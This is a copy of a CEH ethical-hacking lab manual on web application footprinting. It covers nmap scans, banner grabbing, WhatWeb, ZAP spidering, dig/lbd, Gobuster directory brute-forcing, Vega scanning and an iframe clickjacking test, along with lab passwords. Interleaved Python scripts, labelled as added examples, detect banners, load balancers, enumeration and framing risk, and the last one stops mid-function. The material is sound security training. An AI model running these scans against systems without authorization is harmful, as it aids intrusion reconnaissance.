Module 14 Hacking Web Applications

The document outlines the process and objectives of web application hacking, emphasizing the importance of ethical hacking in securing web applications against various attacks. It details the tasks involved in web application reconnaissance, including footprinting, vulnerability scanning, and exploiting vulnerabilities like SQL injection and XSS. The document also introduces tools such as OWASP ZAP and WhatWeb for conducting security assessments and highlights the significance of understanding web application architecture for identifying potential vulnerabilities.

Uploaded by akashaj1425

Scenario

A web application is a software application running on a web browser that allows a web
user to submit data to and retrieve it from a database over the Internet or within an
intranet. Web applications have helped to make web pages dynamic as they allow users
to communicate with servers using server-side scripts. They allow users to perform
specific tasks such as searching, sending emails, connecting with friends, online
shopping, and tracking and tracing.

Entities develop various web applications to offer their services to users via the Internet.
Whenever users need access to such services, they can request them by submitting the
uniform resource identifier (URI) or uniform resource locator (URL) of the web
application in a browser. Common web applications include webmail, online retail sales,
online auctions, wikis, and many others. With the wide adoption of web applications as a
cost-effective channel for communication and information exchange, they have also
become a major attack vector for gaining access to organizations’ information systems.
Web applications are an integral component of online business. Everyone connected via
the Internet uses an endless variety of web applications for different purposes, including
online shopping, email, chats, and social networking. Increasingly, web applications are
becoming vulnerable to more sophisticated threats and attack vectors.

Web application hacking is the exploitation of applications via HTTP by manipulating the
application logic via the application’s graphical web interface, tampering with the
uniform resource identifier (URI), or tampering with HTTP elements not contained in the
URI. Methods for hacking web applications include SQL injection attacks, cross-site
scripting (XSS), cross-site request forgery (CSRF), and insecure communications.

The last module involved acting as an attacker and assessing the security of a web
server platform. Now, it is time to move to the next, and most important, stage of a
security assessment. An expert ethical hacker or penetration tester (hereafter, pen
tester) must test web applications for various attacks such as brute-force, XSS,
parameter tampering, and CSRF, and then secure the web applications from such
attacks.

The labs in this module provide hands-on experience with various web application
attacks to help audit web application security in the target organization.

Objective
The objective of the lab is to perform web application hacking and other tasks that
include, but are not limited to:

- Footprinting a web application using various information-gathering tools
- Performing web spidering, detecting load balancers, and identifying web server
directories
- Performing web application vulnerability scanning
- Performing brute-force and cross-site request forgery (CSRF) attacks
- Exploiting parameter tampering and cross-site scripting (XSS) vulnerabilities
- Exploiting WordPress plugin vulnerabilities
- Exploiting a remote command execution vulnerability
- Exploiting a file upload vulnerability
- Gaining backdoor access via a web shell
- Detecting web application vulnerabilities using various web application security
tools

Overview of Web Applications


Web applications provide an interface between end-users and web servers through a
set of web pages generated at the server end or that contain script code to be executed
dynamically in a client’s Web browser.

Web applications run on web browsers and use a group of server-side scripts (such as
ASP and PHP) and client-side scripts (such as HTML and JavaScript) to execute the
application. The working of a web application depends on its architecture, which
includes the hardware and software that performs tasks such as reading the request,
searching, gathering, and displaying the required data.

Lab Tasks
Ethical hackers or pen testers use numerous tools and techniques to perform web
application attacks on the target web application. Recommended labs that will assist
you in learning various web application attack techniques include:

1. Footprint the web infrastructure
o Perform web application reconnaissance
o Perform web application reconnaissance using WhatWeb
o Perform web spidering using OWASP ZAP
o Detect load balancers using various tools
o Identify web server directories
o Perform web application vulnerability scanning using Vega
o Identify clickjacking vulnerability using iframe
2. Perform web application attacks
o Perform a brute-force attack using Burp Suite
o Perform parameter tampering using Burp Suite
o Exploit parameter tampering and XSS vulnerabilities in web applications
o Perform cross-site request forgery (CSRF) attack
o Enumerate and hack a web application using WPScan and Metasploit
o Exploit a remote command execution vulnerability to compromise a target
web server
o Exploit a file upload vulnerability at different security levels
o Gain backdoor access via a web shell using Weevely
Lab 1: Footprint the Web Infrastructure

Lab Scenario

The first step in web application hacking for an ethical hacker or pen tester is to gather
the maximum available information about the target organization website by
performing web application footprinting using various techniques and tools. In this step,
you will use techniques such as web spidering and vulnerability scanning to gather
complete information about the target web application.

Web infrastructure footprinting helps you to identify vulnerable web applications,
understand how they connect with peers and the technologies they use, and find
vulnerabilities in specific parts of the web app architecture. These vulnerabilities can
further help you to exploit and gain unauthorized access to web applications.

The labs in this exercise demonstrate how easily hackers can gather information about
your web application and describe the vulnerabilities that exist in web applications.

Lab Objectives

- Perform web application reconnaissance
- Perform web application reconnaissance using WhatWeb
- Perform web spidering using OWASP ZAP
- Detect load balancers using various tools
- Identify web server directories
- Perform web application vulnerability scanning using Vega
- Identify clickjacking vulnerability using iframe

Overview of Footprinting the Web Infrastructure

Footprinting the web infrastructure allows attackers to engage in the following tasks:

- Server Discovery: Attackers attempt to discover the physical servers that host
a web application using techniques such as Whois Lookup, DNS Interrogation,
and Port Scanning
- Service Discovery: Attackers discover services running on web servers to
determine whether they can use some of them as attack paths for hacking a web
app
- Server Identification: Attackers use banner-grabbing to obtain server banners;
this helps to identify the make and version of the web server software
- Hidden Content Discovery: Footprinting also allows attackers to extract
content and functionality that is not directly linked to or reachable from the main
visible content

Task 1: Perform Web Application Reconnaissance


In web application reconnaissance, you must perform various tasks such as server
discovery, service discovery, server identification or banner grabbing, and hidden
content discovery. A professional ethical hacker or pen tester must gather as much
information as possible about the target website by performing web application
footprinting using various techniques and tools.

In this task, we will perform web application reconnaissance to gather information about
server IP address, DNS names, location and type of server, open ports and services,
make, model, version of the web server software, and server-side technology.

In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Here, the host machine is the Parrot
Security machine.
1. Click Parrot Security to switch to the Parrot Security machine.

2. In the login page, the attacker username will be selected by default.
Enter password as toor in the Password field and press Enter to log in to
the machine.
3. Perform a Whois lookup to gather information about the IP address of the
web server and the complete information about the domain such as its
registration details, name servers, IP address, and location.

4. Use tools such as Netcraft (https://www.netcraft.com),
SmartWhois (https://www.tamos.com), WHOIS Lookup (http://whois.domaintools.com),
and Batch IP Converter (http://www.sabsoft.com) to perform the Whois lookup.

5. Perform DNS Interrogation to gather information about the DNS servers,
DNS records, and types of servers used by the target organization. DNS zone
data include DNS domain names, computer names, IP addresses, domain
mail servers, service records, etc.

6. Use tools such as Professional Toolset (https://tools.dnsstuff.com),
DNSRecon (https://github.com), DNS Records (https://network-tools.com), and
Domain Dossier (https://centralops.net) to perform DNS interrogation.
7. Now, we will perform port scanning to gather information about the open
ports and services running on the machine hosting the target website.

8. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

9. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

If a Question pop-up window appears, asking you to update the
machine, click No to close the window.
10. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.

11. Now, type cd and press Enter to jump to the root directory.
12. In the Parrot Terminal window, type nmap -T4 -A -v [Target Web
Application] (here, the target web application is www.moviescope.com)
and press Enter to perform a port and service discovery scan.

In this command, -T4 sets the timing template (0-5), -A enables an
aggressive scan, and -v enables verbose output (including all hosts and
ports in the output).
13. The result appears, displaying the open ports and services running on the
machine hosting the target website.
14. Scroll down to see the complete results. You can observe that the target
machine name, NetBIOS name, DNS name, MAC address, OS, and other
information are displayed, as shown in the screenshot.
15. Now, perform banner grabbing to identify the make, model, and version
of the target web server software.

16. In the terminal window, type telnet www.moviescope.com 80 and
press Enter to establish a telnet connection with the target machine.

Port 80 is the port number assigned to the commonly used Internet
communication protocol, Hypertext Transfer Protocol (HTTP).
17. The Trying 10.10.10.19… message appears; type GET / HTTP/1.0 and
press Enter two times.
18. The result appears, displaying information related to the server name,
its version, and the technology used.

19. Here, the server is identified as Microsoft-IIS/10.0 and the technology
used is ASP.NET.

In real-time, an attacker can specify either the IP address of a target
machine or the URL of a website. In both cases, the attacker obtains the
banner information of the respective target. In other words, if the attacker
enters an IP address, they receive the banner information of the target
machine; if they enter the URL of a website, they receive the banner
information of the respective web server that hosts the website.
20. This concludes the demonstration of how to perform web application
reconnaissance (Whois lookup, DNS interrogation, port and services
discovery, banner grabbing, and firewall detection).

21. Close all open windows and document all the acquired information.
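
The banner retrieved in steps 16 to 19 (Server: Microsoft-IIS/10.0, X-Powered-By: ASP.NET) is exactly what a defender should confirm their own servers do not hand out. The script below is an added example, not part of the CEH lab text or of any tool it names: it parses a raw HTTP response and reports which headers disclose a product or a version. The sample response bytes are constructed to resemble the IIS/ASP.NET banner described above rather than a real capture, and the function names (parse_http_response, banner_findings, audit) are this example's own.

```python
"""Flag product- and version-disclosing headers in a raw HTTP response.

Added example (not part of the CEH lab text). The sample responses below are
constructed to resemble the IIS/ASP.NET banner the lab describes; they are
not real captures, and the function names are this example's own.
"""
from __future__ import annotations

import re

# Headers that routinely hand a banner grabber the product or version in use.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")

# A dotted version number such as 10.0 or 4.0.30319 anywhere in the header value.
VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)*")


def parse_http_response(raw: bytes) -> tuple[str, dict[str, str]]:
    """Split a raw HTTP/1.x response into its status line and a lowercase-keyed header map."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed header lines that have no colon
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def banner_findings(headers: dict[str, str]) -> list[dict[str, str]]:
    """Return one finding per disclosing header, rated by what it reveals."""
    findings = []
    for name in DISCLOSING_HEADERS:
        value = headers.get(name)
        if value is None:
            continue
        kind = "version-disclosure" if VERSION_RE.search(value) else "product-disclosure"
        findings.append({"header": name, "value": value, "severity": kind})
    return findings


def audit(raw: bytes) -> list[dict[str, str]]:
    """Parse a response and return its disclosure findings (an empty list means clean)."""
    _status, headers = parse_http_response(raw)
    return banner_findings(headers)


# Constructed sample: a response shaped like the banner the telnet step retrieves.
LEAKY_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Server: Microsoft-IIS/10.0\r\n"
    b"X-AspNet-Version: 4.0.30319\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Constructed sample: the same response after the disclosing headers have been
# suppressed in the server configuration.
HARDENED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit(raw) or "no disclosure")
```

Run it against the bytes a real banner grab returns (the telnet session's output saved to a file, for instance) to turn the manual step into a repeatable check; a clean result is an empty findings list.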

Task 2: Perform Web Application Reconnaissance using WhatWeb

WhatWeb identifies websites and recognizes web technologies, including content
management systems (CMS), blogging platforms, statistics and analytics packages,
JavaScript libraries, web servers, and embedded devices. It also identifies version
numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

Here, we will perform web application reconnaissance using the WhatWeb tool.
In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.

4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window, type whatweb and press Enter. It displays a
list of the commands available with WhatWeb.
6. Now, type whatweb [Target Web Application] (here, the target web
application is www.moviescope.com) and press Enter to perform website
footprinting on the target website.

7. The result appears, displaying the MovieScope website infrastructure,
as shown in the screenshot.
8. In the terminal, type whatweb -v [Target Web Application] (here, the
target web application is www.moviescope.com) and press Enter to run a
verbose scan on the target website.

9. The result appears, displaying a detailed report on the target website
such as its IP address, plugin information, and HTTP header information, as
shown in the screenshot.
10. Now, type whatweb --log-verbose=MovieScope_Report
www.moviescope.com and press Enter to export the results returned by
WhatWeb as a text file.

This will generate a report with the name MovieScope_Report and save
this file in the root folder.
11. Type pluma MovieScope_Report and press Enter to open the file.
12. The MovieScope_Report text file appears, as shown in the screenshot.

In real-time, attackers use this information to determine the website
infrastructure and find underlying vulnerabilities, and later exploit them to
launch further attacks.
13. This concludes the demonstration of how to perform website
reconnaissance on a target website using the WhatWeb tool.

14. Close all open windows and document all the acquired information.

Task 3: Perform Web Spidering using OWASP ZAP


OWASP Zed Attack Proxy (ZAP) is an integrated penetration testing tool for finding
vulnerabilities in web applications. It offers automated scanners as well as a set of tools
that allow you to find security vulnerabilities manually. ZAP provides functionality for a
range of skill levels—from developers to testers new to security testing, to security
testing specialists.

Here, we will perform web spidering on the target website using OWASP ZAP.

In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.

4. Now, type cd and press Enter to jump to the root directory.
5. In the Terminal window, type zaproxy and press Enter to launch
OWASP ZAP.
6. The OWASP ZAP initializing window appears; wait for it to complete.

7. After completing initialization, a prompt that reads Do you want to
persist the ZAP Session? appears; select the No, I do not want to
persist this session at this moment in time radio button and click Start.

If a Manage Add-ons window appears, click the Close button.

8. The OWASP ZAP main window appears. Under the Quick Start tab,
click the Automated Scan option under Welcome to OWASP ZAP.
9. The Automated Scan wizard appears; enter the target website under
the URL to attack field (here, www.moviescope.com). Leave the other
settings at their defaults and click the Attack button.
10. OWASP ZAP starts scanning the target website. You can observe various
URLs under the Spider tab.
11. After performing web spidering, OWASP ZAP performs active scanning.
Navigate to the Active Scan tab to observe the various scanned links.
12. After completing the active scan, the results appear under
the Alerts tab, displaying the various vulnerabilities and issues associated
with the target website, as shown in the screenshot.

In this task, the objective being web spidering, we will focus on the
information obtained while performing web spidering.
13. Now, click on the Spider tab from the lower section of the window to
view the web spidering information. By default, the URLs tab appears under
the Spider tab.

14. The URLs tab contains various links for hidden content and functionality
associated with the target website (www.moviescope.com).
15. Now, navigate to the Messages tab under the Spider tab to view more
detailed information regarding the URLs obtained while performing the web
spidering, as shown in the screenshot.

In real-time, attackers perform web spidering or crawling to discover hidden
content and functionality, which is not reachable from the main visible
content, to exploit user privileges within the application. It also allows
attackers to recover backup copies of live files, configuration and log files
containing sensitive data, backup archives containing snapshots of files
within the web root, and new functionality that is not linked to the main
application.
16. This concludes the demonstration of how to perform web spidering on a
target website using OWASP ZAP.

17. Close all open windows and document all the acquired information.

Task 4: Detect Load Balancers using Various Tools

Organizations use load balancers to distribute web server load over multiple servers
and increase the productivity and reliability of web applications. Generally, there are
two types of load balancers, namely, DNS load balancers (Layer 4 load balancers) and
HTTP load balancers (Layer 7 load balancers). You can use various tools such as dig and
load balancing detector (lbd) to detect the load balancers of the target organization
along with their real IP addresses.

Here, we will detect load balancers using the dig command and the lbd tool.

In this task, we will detect the load balancers on the website www.yahoo.com, as the
websites hosted by our lab environment do not use load balancers.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.

4. Now, type cd and press Enter to jump to the root directory.
5. In the Parrot Terminal window, type dig yahoo.com and
press Enter.
6. The result appears, displaying the available load balancers of the target
website, as the screenshot demonstrates. Here, a single host resolves to
multiple IP addresses, which possibly indicates that the host is using a load
balancer.

The dig command provides detailed results and is used to identify whether the
target domain resolves to multiple IP addresses.
7. Now, type lbd yahoo.com and press Enter.

8. The result appears, displaying the available DNS load balancers used by
the target website, as shown in the screenshot.

lbd (load balancing detector) detects whether a given domain uses DNS and HTTP
load balancing via the Server: and Date: headers and the differences
between server answers. It analyzes the data received from application
responses to detect load balancers.
9. This concludes the demonstration of how to detect load balancers using
the dig command and the lbd tool.

10. Close all open windows and document all the acquired information.
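
The two heuristics this task relies on (dig showing one name with several addresses; lbd comparing Server: and Date: headers across answers) are simple enough to state as code. The block below is an added example, not part of the CEH lab and not lbd's own implementation: it applies a simplified reading of those heuristics to constructed DNS answers and response headers. The addresses (documentation range 203.0.113.0/24), the header values and the function names (dns_balancing_suspected, http_balancing_indicators, assess) are this example's own assumptions.

```python
"""Load-balancer heuristics in the spirit of dig and lbd, over constructed data.

Added example: not part of the CEH lab and not lbd's own code. The heuristics
are a simplified reading of the lbd description in the lab text (multiple A
records; differing Server: headers; Date: headers that run backwards across
consecutive responses). Addresses and responses are constructed sample data.
"""
from __future__ import annotations

from email.utils import parsedate_to_datetime


def dns_balancing_suspected(a_records: list[str]) -> bool:
    """dig heuristic: one hostname resolving to several distinct addresses
    suggests DNS (Layer 4) load balancing."""
    return len(set(a_records)) > 1


def http_balancing_indicators(responses: list[dict[str, str]]) -> dict[str, bool]:
    """lbd-style heuristic over repeated responses to the same URL.

    Two signals are checked: the Server: header changing between responses
    (different software on pool members) and the Date: header moving backwards
    between consecutive responses (unsynchronised clocks behind one address).
    """
    servers = {r.get("Server", "") for r in responses}
    dates = [parsedate_to_datetime(r["Date"]) for r in responses if "Date" in r]
    date_regression = any(later < earlier for earlier, later in zip(dates, dates[1:]))
    return {
        "server_header_differs": len(servers) > 1,
        "date_regression": date_regression,
    }


def assess(a_records: list[str], responses: list[dict[str, str]]) -> dict[str, bool]:
    """Combine both checks into one verdict per layer."""
    http = http_balancing_indicators(responses)
    return {
        "dns_load_balancing": dns_balancing_suspected(a_records),
        "http_load_balancing": http["server_header_differs"] or http["date_regression"],
    }


# Constructed sample: a hostname answering with three documentation-range
# addresses, the shape a dig query against a balanced name produces.
SAMPLE_A_RECORDS = ["203.0.113.10", "203.0.113.11", "203.0.113.12"]

# Constructed sample: three responses to the same request. The Server: header
# is identical, but the third Date: is earlier than the second, i.e. a
# different backend clock answered.
SAMPLE_RESPONSES = [
    {"Server": "nginx", "Date": "Mon, 01 Jan 2024 12:00:00 GMT"},
    {"Server": "nginx", "Date": "Mon, 01 Jan 2024 12:00:01 GMT"},
    {"Server": "nginx", "Date": "Mon, 01 Jan 2024 11:59:58 GMT"},
]

# Constructed sample: a single host answering consistently, so no signal.
SINGLE_A_RECORD = ["203.0.113.10"]
CONSISTENT_RESPONSES = [
    {"Server": "nginx", "Date": "Mon, 01 Jan 2024 12:00:00 GMT"},
    {"Server": "nginx", "Date": "Mon, 01 Jan 2024 12:00:01 GMT"},
]

if __name__ == "__main__":
    print(assess(SAMPLE_A_RECORDS, SAMPLE_RESPONSES))
    print(assess(SINGLE_A_RECORD, CONSISTENT_RESPONSES))
```

Both signals are indicators rather than proof: a CDN, a caching proxy or a single server with a drifting clock can produce the same pattern, which is why lbd reports what it observed rather than a definitive answer.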

Task 5: Identify Web Server Directories

Web servers host the web applications, so misconfigurations while hosting these web
applications may lead to the exposure of critical files and directories over the Internet. A
professional ethical hacker or pen tester must identify the target web application’s files
and directories exposed on the Internet using various automated tools such as Nmap
and Gobuster. This information further helps to gather sensitive information stored in
the files and folders.

Here, we will use the Nmap and Gobuster tools to identify web server directories on the
target website.
In this task, the target website (www.moviescope.com) is hosted by the victim
machine, Windows Server 2019. Keep this machine running until the end of the task.
Here, the host machine is the Parrot Security machine.
1. Click the MATE Terminal icon at the top of the Desktop window to open
a Terminal window.

2. A Parrot Terminal window appears. In the terminal window, type sudo
su and press Enter to run the programs as a root user.

3. In the [sudo] password for attacker field, type toor as a password
and press Enter.

The password that you type will not be visible.

4. Now, type cd and press Enter to jump to the root directory.
5. A Parrot Terminal window appears; type nmap -sV --script=http-enum
[target domain or IP address] (here, the target website
is www.moviescope.com) and press Enter.

6. The result appears, displaying open ports and services, along with their
versions.

7. Scroll down in the result and observe the identified web server directories
under the http-enum section, as shown in the screenshot.

In real-time, attackers use various techniques to detect the vulnerabilities in
the target web applications hosted by the web servers either to gain
administrator-level access to the server or to retrieve sensitive information
stored on the server. Attackers use the Nmap NSE script http-enum to
enumerate the applications, directories, and files of the web servers that are
exposed on the Internet. Through this method, attackers identify critical
security vulnerabilities on the target web application.
8. Now, we shall copy the wordlist file (common.txt) from a shared network
drive. We will use this file in the Gobuster tool.

9. Minimize the Terminal window.

10. Click Places from the top section of the Desktop and
click Desktop from the drop-down options.
11. Navigate to the CEHv11 Module 14 Hacking Web Applications folder and
copy the common.txt file.

Press Ctrl+C to copy the file.

12. Paste the copied file (common.txt) on the Desktop. Close the window.

Press Ctrl+V to paste the file.

13. Now, switch back to the terminal window, type gobuster dir -u
[Target Website] -w /home/attacker/Desktop/common.txt, and
press Enter.

dir: uses directory or file brute-forcing mode, -u: specifies the target URL
(here, www.moviescope.com), and -w: is the wordlist file used for
directory brute-forcing (here, common.txt).
14. The result appears, displaying the identified web server directories, as
shown in the screenshot.

In real-time, attackers use Gobuster to scan the target website for web
server directories and perform fast-paced enumeration of the hidden files
and directories of the target web application. Gobuster is a command-line
tool used to brute-force URIs in websites, DNS subdomains, and
names of the virtual hosts on the target server.
15. This concludes the demonstration of how to identify web server
directories using Nmap and Gobuster.

16. Close all open windows and document all the acquired information.
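
A wordlist scan such as the http-enum and Gobuster runs above leaves a distinctive trace on the server side: one client producing a burst of 404 responses for many different paths in a short time. The block below is an added example, not part of the CEH lab or of either tool: it parses combined-format access log lines (Apache/nginx style) and flags any client whose 404 count inside a sliding window reaches a threshold. The log lines are constructed sample data, the window and threshold are assumptions to tune per site, and the function names (parse_line, find_enumeration) are this example's own.

```python
"""Detect directory brute-forcing (http-enum / Gobuster style) in access logs.

Added example: not part of the CEH lab. It reads Apache/nginx combined-format
lines and flags any client whose 404 responses within a sliding window reach a
threshold. The log lines are constructed sample data; the window and threshold
are assumptions to tune per site.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)


def parse_line(line: str) -> dict | None:
    """Return ip, timestamp, path and status for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_enumeration(lines: list[str], window: timedelta = timedelta(seconds=60),
                     threshold: int = 20) -> dict[str, int]:
    """Map each client IP to its peak number of 404s inside any `window`, keeping
    only clients that reach `threshold`. A burst of 404s for distinct paths is
    the signature a wordlist scan leaves behind."""
    misses: dict[str, list[datetime]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append(rec["ts"])

    flagged: dict[str, int] = {}
    for ip, stamps in misses.items():
        stamps.sort()
        peak, start = 0, 0
        for end, ts in enumerate(stamps):  # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _log_line(ip: str, when: datetime, path: str, status: int) -> str:
    """Build one constructed combined-format line for the sample below."""
    return (f'{ip} - - [{when:%d/%b/%Y:%H:%M:%S %z}] "GET {path} HTTP/1.1" {status} 0 '
            f'"-" "constructed-sample"')


_T0 = datetime.strptime("10/Oct/2024:13:55:00 +0000", "%d/%b/%Y:%H:%M:%S %z")

# Constructed sample: one client requesting 24 wordlist-style paths in 24 seconds
# (all 404), interleaved with an ordinary visitor fetching real pages.
SAMPLE_LOG: list[str] = []
for i in range(24):
    SAMPLE_LOG.append(_log_line("10.10.10.13", _T0 + timedelta(seconds=i), f"/guess{i}", 404))
    if i % 8 == 0:
        SAMPLE_LOG.append(_log_line("10.10.10.50", _T0 + timedelta(seconds=i), "/index.html", 200))
SAMPLE_LOG.append(_log_line("10.10.10.50", _T0 + timedelta(seconds=30), "/missing.png", 404))

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

The same rule expressed in a SIEM query (count of 404s per source over a one-minute bucket) is the usual production form; keeping distinct paths rather than raw requests in the count avoids flagging a browser that retries one broken link.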

Task 6: Perform Web Application Vulnerability Scanning using Vega

Vega is a web application scanner used to test the security of web applications. It helps
you to find and validate SQL Injection, XSS, inadvertently disclosed sensitive
information, and other vulnerabilities.

Here, we will discover vulnerabilities in the target web application using Vega.

In this task, the target website (http://10.10.10.16:8080/dvwa) is hosted by the
victim machine Windows Server 2016; keep this machine running until the end of the
task. Here, the host machine is the Windows 10 machine.
1. Click Windows Server 2016 to switch to the Windows Server
2016 machine. Click Ctrl+Alt+Delete to activate the machine. By
default, the CEH\Administrator account is selected; click Pa$$w0rd to enter
the password and press Enter.

2. Now, in the right corner of the Desktop, click the Show hidden icons icon and
observe that the WampServer icon appears.

3. Wait for this icon to turn green, which indicates that the WampServer is
successfully running.
4. Click Windows 10 to switch to the Windows 10 machine, and
click Ctrl+Alt+Delete to activate the machine.

Alternatively, you can also click the Ctrl+Alt+Delete button under the Windows
10 machine thumbnail in the Resources pane or
click the Ctrl+Alt+Delete button under the Commands (thunder icon) menu.
5. By default, the Admin user profile is selected; click Pa$$w0rd to paste the
password in the Password field and press Enter to log in.

Alternatively, you can also click Pa$$w0rd under the Windows 10 machine
thumbnail in the Resources pane or click the Type Text | Type
Password button under the Commands (thunder icon) menu.

The Networks screen appears; click Yes to allow your PC to be discoverable by
other PCs and devices on the network.
6. On the Desktop, double-click the Vega shortcut to launch the tool.
7. The Subgraph Vega main window appears, as shown in the screenshot.

8. Click Scan from the menu bar and select Start New Scan from the
available options.
9. The Select a Scan Target window appears on the screen. Ensure that
the Enter a base URI for scan radio button is selected under the Scan
Target section.

10. In the Enter a base URI for scan field, enter the target URL
as http://10.10.10.16:8080/dvwa and click Next.

10.10.10.16 is the IP address of Windows Server 2016, where
the DVWA site is hosted on port 8080.
11. The Select Modules wizard appears; double-click on both of the
checkboxes (Injection Modules and Response Processing Modules) to
select all options.

12. By checking these options, all modules under these options will be
selected. Click Next.
13. In the Authentication Options wizard, leave the settings at their defaults and
click Next.

14. In the Parameters wizard, leave the settings at their defaults and click Finish to
initiate the scan.
15. The Follow Redirect? pop-up appears; click Yes to continue.
16. The Vega application starts scanning the target website for
vulnerabilities. Observe the Scanner Progress bar and wait for it to finish.

In the left-hand pane, under the Scan Alerts section, you can see the scan
status as Auditing. As soon as Vega completes, the scan status changes
to Completed.

17. After the scanner finishes performing its vulnerability assessment on the
target website, it lists the discovered vulnerabilities under Scan Alert
Summary.
18. In the left pane under Scan Alerts, expand the nodes to view the
complete vulnerability scan result. Now, choose any one of the discovered
vulnerabilities to display it on the respective page, as in the dashboard
section shown in the screenshot.

19. Choose any one vulnerability under the Scan Alerts section in the left-
hand pane. Here, we are selecting the Cleartext Password over
HTTP vulnerability; detailed information regarding the selected vulnerability
will be displayed in the right section of the window, as shown in the
screenshot.
20. Similarly, you can select any vulnerability from the list of discovered
vulnerabilities to view its detailed information and then apply appropriate
fixes for all the vulnerable code in your web application.

21. This concludes the demonstration of how to discover vulnerabilities in a
target website by scanning it using Vega.

22. You can also use other web application vulnerability scanning tools such
as WPScan Vulnerability Database (https://wpscan.com),
Arachni (https://www.arachni-scanner.com), AppSpider (https://www.rapid7.com),
or Uniscan (https://sourceforge.net) to discover vulnerabilities in the target
website.

23. Close all open windows and document all the acquired information.

Task 7: Identify Clickjacking Vulnerability using iframe

Clickjacking, also known as a “UI redress attack,” occurs when an attacker uses multiple
transparent or opaque layers to trick a user into clicking on a button or link on another
page when they intend to click on the top-level page. Thus, the attacker is “hijacking”
clicks meant for the top-level page and routing them to another page, most likely
owned by another application, domain, or both.

Here, we will identify clickjacking vulnerability using iframe.

In this task, we will identify clickjacking vulnerability in the target website
(www.moviescope.com) hosted by the Windows Server 2019 machine, and we will
use the Windows 10 machine as the host machine.
1. In the Windows 10 machine, navigate to D:\CEH-Tools\CEHv11 Module
14 Hacking Web Applications and double-click the iframe.html file; the
file opens in the default web browser (here, Google Chrome).

2. The target website appears in the created iframe, indicating that the
target website is vulnerable to clickjacking, as shown in the screenshot.

If you can see the text “Website is vulnerable to clickjacking!” at the
top of the page, and your target web page is also successfully loaded into
the frame, then your site is vulnerable and has no type of protection against
Clickjacking attacks.
3. This concludes the demonstration of how to identify clickjacking
vulnerability on a target website.

4. Close all open windows and document all the acquired information.
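
The iframe.html test above succeeds because the target sends no framing restriction; the fix is an X-Frame-Options header or, preferably, a Content-Security-Policy frame-ancestors directive, which browsers apply in preference to X-Frame-Options when both are present. The block below is an added example, not part of the CEH lab or of the iframe.html file it uses: it evaluates a response's headers and decides whether a page at one origin could be framed from another, so the same check can be run from a script against every page of a site. The header sets, origins (third-party.example, partner.example) and function names (frameable_by, audit) are constructed for this example, and the CSP source matching is deliberately simplified (scheme, exact host and leading wildcard only).

```python
"""Decide whether response headers allow a page to be framed (clickjacking check).

Added example: not part of the CEH lab. It evaluates X-Frame-Options and the
Content-Security-Policy frame-ancestors directive and reports whether a page
served at `page_origin` could be embedded by `framing_origin`. Header sets and
origins below are constructed samples; CSP source matching is simplified.
"""
from __future__ import annotations


def _csp_frame_ancestors(csp: str) -> list[str] | None:
    """Return the frame-ancestors source list from a CSP header, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def _origin_matches(source: str, origin: str) -> bool:
    """Match one CSP source expression against a scheme://host origin (simplified)."""
    if source == "*":
        return True
    scheme, _, host = origin.partition("://")
    if source.endswith(":"):                       # scheme-source such as https:
        return scheme == source[:-1]
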